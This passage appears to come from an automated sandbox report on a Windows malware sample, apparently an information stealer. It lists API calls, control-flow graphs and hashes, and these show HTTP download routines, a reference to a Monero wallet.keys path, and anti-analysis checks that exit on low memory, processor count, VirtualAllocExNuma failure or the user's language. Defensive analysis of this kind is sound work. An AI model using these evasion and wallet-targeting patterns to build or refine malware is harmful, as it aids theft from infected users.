                            • GetProcAddress.KERNEL32(76DA0000,00A9C3D8), ref: 00ECA497
                            • GetProcAddress.KERNEL32(77300000,00A86800), ref: 00ECA4B8
                            • GetProcAddress.KERNEL32(77300000,00A86680), ref: 00ECA4D1
                            • GetProcAddress.KERNEL32(767E0000,00A86600), ref: 00ECA4F2
                            • GetProcAddress.KERNEL32(767E0000,00A9C360), ref: 00ECA50A
                            • GetProcAddress.KERNEL32(6F6A0000,00A86860), ref: 00ECA530
                            • GetProcAddress.KERNEL32(6F6A0000,00A86660), ref: 00ECA548
                            • GetProcAddress.KERNEL32(6F6A0000,00A86880), ref: 00ECA560
                            • GetProcAddress.KERNEL32(6F6A0000,00A9C480), ref: 00ECA579
                            • GetProcAddress.KERNEL32(6F6A0000,00A868A0), ref: 00ECA591
                            • GetProcAddress.KERNEL32(6F6A0000,00A866C0), ref: 00ECA5A9
                            • GetProcAddress.KERNEL32(6F6A0000,00A868E0), ref: 00ECA5C2
                            • GetProcAddress.KERNEL32(6F6A0000,00A86900), ref: 00ECA5DA
                            • GetProcAddress.KERNEL32(6F6A0000,InternetSetOptionA), ref: 00ECA5F1
                            • GetProcAddress.KERNEL32(6F6A0000,HttpQueryInfoA), ref: 00ECA607
                            • GetProcAddress.KERNEL32(75760000,00A9C3F0), ref: 00ECA629
                            • GetProcAddress.KERNEL32(75760000,00A989C8), ref: 00ECA641
                            • GetProcAddress.KERNEL32(75760000,00A9C498), ref: 00ECA659
                            • GetProcAddress.KERNEL32(75760000,00A9C4E0), ref: 00ECA672
                            • GetProcAddress.KERNEL32(762C0000,00A86940), ref: 00ECA693
                            • GetProcAddress.KERNEL32(6FF10000,00A9C528), ref: 00ECA6B4
                            • GetProcAddress.KERNEL32(6FF10000,00A86960), ref: 00ECA6CD
                            • GetProcAddress.KERNEL32(6FF10000,00A9C618), ref: 00ECA6E5
                            • GetProcAddress.KERNEL32(6FF10000,00A9C540), ref: 00ECA6FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: 9f50c77409f5d74f8a170e58bd44b04ec70dbdcf436ee6ffe3002b185cf3576d
                            • Instruction ID: 46ac0b2308f81182d734249ffe9c80ba7df571999c4682df2352af1e8311f4f4
                            • Opcode Fuzzy Hash: 9f50c77409f5d74f8a170e58bd44b04ec70dbdcf436ee6ffe3002b185cf3576d
                            • Instruction Fuzzy Hash: D7623AB5700201EFC364DFA9E98AD5637F9F78C641714855EA68EC3A4CD67FA842CB20

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1033 eb6280-eb630b call eca7a0 call eb47b0 call eca740 InternetOpenA StrCmpCA 1040 eb630d 1033->1040 1041 eb6314-eb6318 1033->1041 1040->1041 1042 eb6509-eb6525 call eca7a0 call eca800 * 2 1041->1042 1043 eb631e-eb6342 InternetConnectA 1041->1043 1061 eb6528-eb652d 1042->1061 1044 eb6348-eb634c 1043->1044 1045 eb64ff-eb6503 InternetCloseHandle 1043->1045 1047 eb635a 1044->1047 1048 eb634e-eb6358 1044->1048 1045->1042 1051 eb6364-eb6392 HttpOpenRequestA 1047->1051 1048->1051 1053 eb6398-eb639c 1051->1053 1054 eb64f5-eb64f9 InternetCloseHandle 1051->1054 1056 eb639e-eb63bf InternetSetOptionA 1053->1056 1057 eb63c5-eb6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1059 eb642c-eb644b call ec8940 1057->1059 1060 eb6407-eb6427 call eca740 call eca800 * 2 1057->1060 1067 eb64c9-eb64e9 call eca740 call eca800 * 2 1059->1067 1068 eb644d-eb6454 1059->1068 1060->1061 1067->1061 1071 eb64c7-eb64ef InternetCloseHandle 1068->1071 1072 eb6456-eb6480 InternetReadFile 1068->1072 1071->1054 1076 eb648b 1072->1076 1077 eb6482-eb6489 1072->1077 1076->1071 1077->1076 1080 eb648d-eb64c5 call eca9b0 call eca8a0 call eca800 1077->1080 1080->1072
                            APIs
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EB4839
                              • Part of subcall function 00EB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EB4849
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • InternetOpenA.WININET(00ED0DFE,00000001,00000000,00000000,00000000), ref: 00EB62E1
                            • StrCmpCA.SHLWAPI(?,00A9E3D0), ref: 00EB6303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EB6335
                            • HttpOpenRequestA.WININET(00000000,GET,?,00A9DC50,00000000,00000000,00400100,00000000), ref: 00EB6385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EB63BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EB63D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00EB63FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EB646D
                            • InternetCloseHandle.WININET(00000000), ref: 00EB64EF
                            • InternetCloseHandle.WININET(00000000), ref: 00EB64F9
                            • InternetCloseHandle.WININET(00000000), ref: 00EB6503
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: 3ceaf0351ce2f506f52c8bbc7958d9e9bba5e8df7fb9de0855afd1ef29a863b3
                            • Instruction ID: 21e77dc77537cc5654abdf4576809aa2c3608c4609afa562343c0c74dfd36d47
                            • Opcode Fuzzy Hash: 3ceaf0351ce2f506f52c8bbc7958d9e9bba5e8df7fb9de0855afd1ef29a863b3
                            • Instruction Fuzzy Hash: 8B716C71A00218EBDB24DFA0CC49FEE77B4BB44704F1090A9F10A7B584DBB96A86CF51

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1090 ec5510-ec5577 call ec5ad0 call eca820 * 3 call eca740 * 4 1106 ec557c-ec5583 1090->1106 1107 ec5585-ec55b6 call eca820 call eca7a0 call eb1590 call ec51f0 1106->1107 1108 ec55d7-ec564c call eca740 * 2 call eb1590 call ec52c0 call eca8a0 call eca800 call ecaad0 StrCmpCA 1106->1108 1123 ec55bb-ec55d2 call eca8a0 call eca800 1107->1123 1134 ec5693-ec56a9 call ecaad0 StrCmpCA 1108->1134 1138 ec564e-ec568e call eca7a0 call eb1590 call ec51f0 call eca8a0 call eca800 1108->1138 1123->1134 1139 ec57dc-ec5844 call eca8a0 call eca820 * 2 call eb1670 call eca800 * 4 call ec6560 call eb1550 1134->1139 1140 ec56af-ec56b6 1134->1140 1138->1134 1269 ec5ac3-ec5ac6 1139->1269 1142 ec56bc-ec56c3 1140->1142 1143 ec57da-ec585f call ecaad0 StrCmpCA 1140->1143 1146 ec571e-ec5793 call eca740 * 2 call eb1590 call ec52c0 call eca8a0 call eca800 call ecaad0 StrCmpCA 1142->1146 1147 ec56c5-ec5719 call eca820 call eca7a0 call eb1590 call ec51f0 call eca8a0 call eca800 1142->1147 1162 ec5865-ec586c 1143->1162 1163 ec5991-ec59f9 call eca8a0 call eca820 * 2 call eb1670 call eca800 * 4 call ec6560 call eb1550 1143->1163 1146->1143 1246 ec5795-ec57d5 call eca7a0 call eb1590 call ec51f0 call eca8a0 call eca800 1146->1246 1147->1143 1168 ec598f-ec5a14 call ecaad0 StrCmpCA 1162->1168 1169 ec5872-ec5879 1162->1169 1163->1269 1198 ec5a28-ec5a91 call eca8a0 call eca820 * 2 call eb1670 call eca800 * 4 call ec6560 call eb1550 1168->1198 1199 ec5a16-ec5a21 Sleep 1168->1199 1175 ec587b-ec58ce call eca820 call eca7a0 call eb1590 call ec51f0 call eca8a0 call eca800 1169->1175 1176 ec58d3-ec5948 call eca740 * 2 call eb1590 call ec52c0 call eca8a0 call eca800 call ecaad0 StrCmpCA 1169->1176 1175->1168 1176->1168 1274 ec594a-ec598a call eca7a0 call eb1590 call ec51f0 call eca8a0 call eca800 1176->1274 1198->1269 1199->1106 1246->1143 1274->1168
                            APIs
                              • Part of subcall function 00ECA820: lstrlen.KERNEL32(00EB4F05,?,?,00EB4F05,00ED0DDE), ref: 00ECA82B
                              • Part of subcall function 00ECA820: lstrcpy.KERNEL32(00ED0DDE,00000000), ref: 00ECA885
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EC5644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EC56A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EC5857
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EC51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EC5228
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00EC52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EC5318
                              • Part of subcall function 00EC52C0: lstrlen.KERNEL32(00000000), ref: 00EC532F
                              • Part of subcall function 00EC52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00EC5364
                              • Part of subcall function 00EC52C0: lstrlen.KERNEL32(00000000), ref: 00EC5383
                              • Part of subcall function 00EC52C0: lstrlen.KERNEL32(00000000), ref: 00EC53AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EC578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EC5940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EC5A0C
                            • Sleep.KERNEL32(0000EA60), ref: 00EC5A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 96c550298f646c83aba913a5cfc656e6d8c03703fe293699a8df251c443a2901
                            • Instruction ID: 9cc01ae8f2d58dc3783b8a838396815594b8ca0b5afbbd2823742060bed08bf6
                            • Opcode Fuzzy Hash: 96c550298f646c83aba913a5cfc656e6d8c03703fe293699a8df251c443a2901
                            • Instruction Fuzzy Hash: A2E143739101089BCB18FB60DA5BFED73B8AB54304F44916DB40673585EF366A4BCBA2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1301 ec17a0-ec17cd call ecaad0 StrCmpCA 1304 ec17cf-ec17d1 ExitProcess 1301->1304 1305 ec17d7-ec17f1 call ecaad0 1301->1305 1309 ec17f4-ec17f8 1305->1309 1310 ec17fe-ec1811 1309->1310 1311 ec19c2-ec19cd call eca800 1309->1311 1313 ec199e-ec19bd 1310->1313 1314 ec1817-ec181a 1310->1314 1313->1309 1316 ec18ad-ec18be StrCmpCA 1314->1316 1317 ec18cf-ec18e0 StrCmpCA 1314->1317 1318 ec198f-ec1999 call eca820 1314->1318 1319 ec1849-ec1858 call eca820 1314->1319 1320 ec1821-ec1830 call eca820 1314->1320 1321 ec185d-ec186e StrCmpCA 1314->1321 1322 ec187f-ec1890 StrCmpCA 1314->1322 1323 ec1835-ec1844 call eca820 1314->1323 1324 ec1970-ec1981 StrCmpCA 1314->1324 1325 ec18f1-ec1902 StrCmpCA 1314->1325 1326 ec1951-ec1962 StrCmpCA 1314->1326 1327 ec1932-ec1943 StrCmpCA 1314->1327 1328 ec1913-ec1924 StrCmpCA 1314->1328 1348 ec18ca 1316->1348 1349 ec18c0-ec18c3 1316->1349 1350 ec18ec 1317->1350 1351 ec18e2-ec18e5 1317->1351 1318->1313 1319->1313 1320->1313 1344 ec187a 1321->1344 1345 ec1870-ec1873 1321->1345 1346 ec189e-ec18a1 1322->1346 1347 ec1892-ec189c 1322->1347 1323->1313 1338 ec198d 1324->1338 1339 ec1983-ec1986 1324->1339 1329 ec190e 1325->1329 1330 ec1904-ec1907 1325->1330 1335 ec196e 1326->1335 1336 ec1964-ec1967 1326->1336 1333 ec194f 1327->1333 1334 ec1945-ec1948 1327->1334 1331 ec1926-ec1929 1328->1331 1332 ec1930 1328->1332 1329->1313 1330->1329 1331->1332 1332->1313 1333->1313 1334->1333 1335->1313 1336->1335 1338->1313 1339->1338 1344->1313 1345->1344 1355 ec18a8 1346->1355 1347->1355 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 00EC17C5
                            • ExitProcess.KERNEL32 ref: 00EC17D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 0a766cbfb1c80ad8dbb4f49424734647cf1dd8a979292addf905186dc6d90406
                            • Instruction ID: fc3a0981b12dbe5e0b60e0a23ee45d9517273774cf1e9ffcfe584d191cb9059b
                            • Opcode Fuzzy Hash: 0a766cbfb1c80ad8dbb4f49424734647cf1dd8a979292addf905186dc6d90406
                            • Instruction Fuzzy Hash: 135178B5A04209EBCB04DFA0CA55FBE77B5AF89704F10A08DE40AB7341D776A943CB61

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1356 ec7500-ec754a GetWindowsDirectoryA 1357 ec754c 1356->1357 1358 ec7553-ec75c7 GetVolumeInformationA call ec8d00 * 3 1356->1358 1357->1358 1365 ec75d8-ec75df 1358->1365 1366 ec75fc-ec7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 ec75e1-ec75fa call ec8d00 1365->1367 1369 ec7628-ec7658 wsprintfA call eca740 1366->1369 1370 ec7619-ec7626 call eca740 1366->1370 1367->1365 1377 ec767e-ec768e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00EC7542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EC757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC7603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC760A
                            • wsprintfA.USER32 ref: 00EC7640
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$
                            • API String ID: 1544550907-3109660283
                            • Opcode ID: 24e74eae9c985090469d2ffe213209f0464bab58df235240325b41b64d2aede5
                            • Instruction ID: 13813f9443c7b1c187f3d60d45d826c6a7871795ed3cf557649a94eec07af333
                            • Opcode Fuzzy Hash: 24e74eae9c985090469d2ffe213209f0464bab58df235240325b41b64d2aede5
                            • Instruction Fuzzy Hash: 2F418FB1E04248EBDB10DB94DE45FEEBBB8AB08704F10019DF54977280D77A6A45CFA5

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A90660), ref: 00EC98A1
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A907E0), ref: 00EC98BA
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A906A8), ref: 00EC98D2
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A907C8), ref: 00EC98EA
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A90768), ref: 00EC9903
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A98B28), ref: 00EC991B
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A86240), ref: 00EC9933
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A861E0), ref: 00EC994C
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A906D8), ref: 00EC9964
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A90570), ref: 00EC997C
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A90588), ref: 00EC9995
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A906F0), ref: 00EC99AD
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A86480), ref: 00EC99C5
                              • Part of subcall function 00EC9860: GetProcAddress.KERNEL32(76F70000,00A90708), ref: 00EC99DE
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00EB11D0: ExitProcess.KERNEL32 ref: 00EB1211
                              • Part of subcall function 00EB1160: GetSystemInfo.KERNEL32(?), ref: 00EB116A
                              • Part of subcall function 00EB1160: ExitProcess.KERNEL32 ref: 00EB117E
                              • Part of subcall function 00EB1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EB112B
                              • Part of subcall function 00EB1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00EB1132
                              • Part of subcall function 00EB1110: ExitProcess.KERNEL32 ref: 00EB1143
                              • Part of subcall function 00EB1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EB123E
                              • Part of subcall function 00EB1220: __aulldiv.LIBCMT ref: 00EB1258
                              • Part of subcall function 00EB1220: __aulldiv.LIBCMT ref: 00EB1266
                              • Part of subcall function 00EB1220: ExitProcess.KERNEL32 ref: 00EB1294
                              • Part of subcall function 00EC6770: GetUserDefaultLangID.KERNEL32 ref: 00EC6774
                              • Part of subcall function 00EB1190: ExitProcess.KERNEL32 ref: 00EB11C6
                              • Part of subcall function 00EC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EB11B7), ref: 00EC7880
                              • Part of subcall function 00EC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00EC7887
                              • Part of subcall function 00EC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EC789F
                              • Part of subcall function 00EC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC7910
                              • Part of subcall function 00EC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EC7917
                              • Part of subcall function 00EC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00EC792F
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00A98AC8,?,00ED110C,?,00000000,?,00ED1110,?,00000000,00ED0AEF), ref: 00EC6ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EC6AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00EC6AF9
                            • Sleep.KERNEL32(00001770), ref: 00EC6B04
                            • CloseHandle.KERNEL32(?,00000000,?,00A98AC8,?,00ED110C,?,00000000,?,00ED1110,?,00000000,00ED0AEF), ref: 00EC6B1A
                            • ExitProcess.KERNEL32 ref: 00EC6B22
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
